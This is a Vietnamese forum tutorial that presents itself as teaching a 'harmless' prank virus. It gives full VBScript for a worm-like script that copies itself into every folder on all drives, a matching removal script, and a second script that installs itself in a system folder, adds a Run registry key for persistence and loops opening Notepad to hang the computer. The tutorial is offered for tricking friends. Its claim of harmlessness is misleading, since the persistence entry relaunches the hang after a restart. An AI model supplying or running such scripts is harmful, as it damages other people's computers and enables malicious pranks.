TUT tạo ra virus bá đạo nhưng không hại máy mới nhất 2018 by Trần Hà

  Đầu tiên pine xin mạn phép viết một bài giới thiệu sơ về đoạn mã độc được một tác giả khác viết trên nền vsb và đã được edit lại ( mã lúc đầu là phá hỏng ổ cứng ) 
  Tiếp theo là cho các bạn so sánh giữa mã độc và mã giải độc là như thế nào để các bạn so sánh giữ viết mã ra và giải mã cho nó đơn giản thế nào nhưng lại vô cùng ác độc hjhj
  Bên dưới pine sẽ demo cho các bạn xem bằng hình anh mình tự sướng với con virut này và tự xữ nó lun >:)
  Yên tâm là ko seo đâu nhá : 

  Bước đầu thả virut 

  [IMG]
  [IMG]
  [IMG]
  [IMG]

  Bước 2 Giải độc 

  [IMG]
  [IMG]

  Đầu tiên để tạo virut giả trêu người khác

  Bạn vào Start => Run => gõ "NOTEPAD" sau đó nhấn Enter rồi chép đoạn này vào:
  HTML:
  'pinetrees !!! ^_^
  Dim fso,file,VBCopy
  Set fso=CreateObject("Scripting.FileSystemObject")
  Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
  VBCopy=file.ReadAll
  FolderList("A:\")
  FolderList("B:\")
  FolderList("C:\")
  FolderList("D:\")
  FolderList("E:\")
  FolderList("F:\")
  FolderList("G:\")
  FolderList("H:\")
  FolderList("I:\")
  FolderList("J:\")
  FolderList("K:\")
  FolderList("L:\")
  FolderList("M:\")
  FolderList("N:\")
  FolderList("O:\")
  FolderList("P:\")
  FolderList("Q:\")
  FolderList("R:\")
  FolderList("S:\")
  FolderList("T:\")
  FolderList("U:\")
  FolderList("V:\")
  FolderList("X:\")
  FolderList("Y:\")
  FolderList("Z:\")
  FolderList("W:\")
  
  Sub FolderList(FolderSpec)
  On Error Resume Next
  Dim f,f1,sf,COP,CAP
  Set f=fso.GetFolder(FolderSpec)
  set sf=f.SubFolders
  For Each f1 In sf
  Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
  COP.write VBCopy
  Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
  CAP.write VBCopy
  FolderList(f1.Path)
  Next
  End sub
  Rồi nhấn Ctrl + S => Save lại với tên là: Thuoc_Doc.vbs
  nhớ đuôi phải là .VBS nha
  chỉ cần chạy file này là "Tràn ngập Virus !"
  Còn đây là file thuốc giải:


  HTML:
  'Thuoc Giai
  Dim fso,file,VBCopy
  Set fso=CreateObject("Scripting.FileSystemObject")
  Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
  VBCopy=file.ReadAll
  FolderList("A:\")
  FolderList("B:\")
  FolderList("C:\")
  FolderList("D:\")
  FolderList("E:\")
  FolderList("F:\")
  FolderList("G:\")
  FolderList("H:\")
  FolderList("I:\")
  FolderList("J:\")
  FolderList("K:\")
  FolderList("L:\")
  FolderList("M:\")
  FolderList("N:\")
  FolderList("O:\")
  FolderList("P:\")
  FolderList("Q:\")
  FolderList("R:\")
  FolderList("S:\")
  FolderList("T:\")
  FolderList("U:\")
  FolderList("V:\")
  FolderList("X:\")
  FolderList("Y:\")
  FolderList("Z:\")
  FolderList("W:\")
  
  Sub FolderList(FolderSpec)
  On Error Resume Next
  Dim f,f1,sf,COP,CAP,ATT
  Set f=fso.GetFolder(FolderSpec)
  set sf=f.SubFolders
  For Each f1 In sf
  'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
  'COP.write VBCopy
  'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
  'CAP.write VBCopy
  'Set ATT=fso.GetFolder(f1.Path)
  'ATT.Attributes=ATT.Attributes+2
  fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
  fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
  FolderList(f1.Path)
  Next
  End sub
  cũng lưu lại như trên với tên : Thuoc_Giai.vbs
  nhớ là vbs là đuôi chứ ko phải tên.

  Tiếp theo
  Bạn mở notepad lên chép đoạn mã sau vào:

  On Error Resume Next
  Set popo= Createobject("scripting.filesystemobject")
  popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
  Set popo2= CreateObject("WScript.Shell")
  popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\cod e1","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
  Set treomay= CreateObject("WScript.Shell")
  Do
  treomay.run "notepad",false
  loop
  cái này sẽ làm máy bị treo
  lưu lại với tên jì cũng đc nhưng với đuôi là ".vbs"
  Ví Dụ: treomay.vbs
  muốn sửa thì chỉ cần Restart là OK
  Tiếp tục với phần mềm
  Bạn muốn dọa thằng bạn ngốc của mình bằng virus ư ? nhưng virus ở đâu ra đây, lỡ chạy hư máy nó bắt đền thì sao đây ?
  The Ultimate Virus là chương trình giả virus giúp bạn lừa được họ.
  Đặc tính của nó là không hại máy tính mà chỉ đưa ra các cảnh báo giả để hù dọa mà thôi, không có lây lan đâu. Từ từ khám phá nhé.
  ...
  Nội dung chính